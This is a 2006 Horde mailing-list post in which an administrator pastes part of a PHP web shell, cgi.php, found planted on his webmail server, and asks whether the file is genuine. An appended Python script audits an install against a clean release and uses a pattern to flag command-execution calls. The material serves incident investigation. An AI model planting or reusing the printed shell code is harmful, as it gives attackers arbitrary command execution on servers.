[horde] Phishing despite latest CVS?
Jan Johansson
j2 at mupp.net
Wed May 3 14:04:24 PDT 2006
>The attacker has probably already installed a backdoor before you
>upgraded and is installing the file through that.
Ok, this is probably not correct? Is cgi.php even a Horde-file in its
_original_ form?
scooter:~# less /var/www/webmail.skyddsrummet.net/horde/services/help/cgi.php
closedir($dir_handle);
?>
</select></p>
<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>
<p>Enable <code>stderr</code>-trapping? <input type="checkbox"
name="stderr"></p>
<textarea cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
system($command);
}
?>
</textarea>
</form>
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
<hr>
<i>Copyright © 2000–2002, <a
href="mailto:gimpster at gimpster.com">Martin Geisler</a>. Get the latest
version at <a href="http://www.gimpster.com">www.gimpster.com</a>.</i>
</body>
</html>
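One way to answer the question above (is cgi.php part of the original distribution?), as an added example that is not part of the original post or of Horde: compare the installed tree against a clean unpack of the same release, list files that were added or changed, and note which of those call PHP command-execution functions such as the system($command) in the paste. The sample trees are constructed, and every file name in them except cgi.php is hypothetical.

```python
import hashlib, re, tempfile
from pathlib import Path

# PHP calls that run OS commands; the pasted cgi.php uses system($command).
EXEC_CALL = re.compile(rb"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(")

def manifest(root):
    """Map relative path -> SHA-256 for every file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def audit(installed, pristine):
    """Compare a live tree with a clean unpack of the same release."""
    live, clean = manifest(installed), manifest(pristine)
    report = {"added": [], "modified": [], "exec_calls": []}
    for rel, digest in live.items():
        if rel not in clean:
            report["added"].append(rel)      # not shipped with the release
        elif clean[rel] != digest:
            report["modified"].append(rel)   # shipped, but content differs
        else:
            continue                         # byte-identical: nothing to review
        body = (Path(installed) / rel).read_bytes()
        if rel.endswith(".php") and EXEC_CALL.search(body):
            report["exec_calls"].append(rel)
    return report

def demo():
    """Build constructed sample trees in a temp dir and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for tree in (clean, live):
            (tree / "services/help").mkdir(parents=True)
            (tree / "services/help/index.php").write_text("<?php echo 'help'; ?>\n")
            (tree / "config.php").write_text("<?php $debug = false; ?>\n")
        # Local edit to a shipped file, plus a file the release never contained.
        (live / "config.php").write_text("<?php $debug = true; ?>\n")
        (live / "services/help/cgi.php").write_text(
            "<?php if (!empty($command)) { system($command); } ?>\n")
        return audit(live, clean)

if __name__ == "__main__":
    print(demo())
```

Files reported under "added" answer the original-form question directly; "modified" entries still need a manual diff, since local configuration changes land there too.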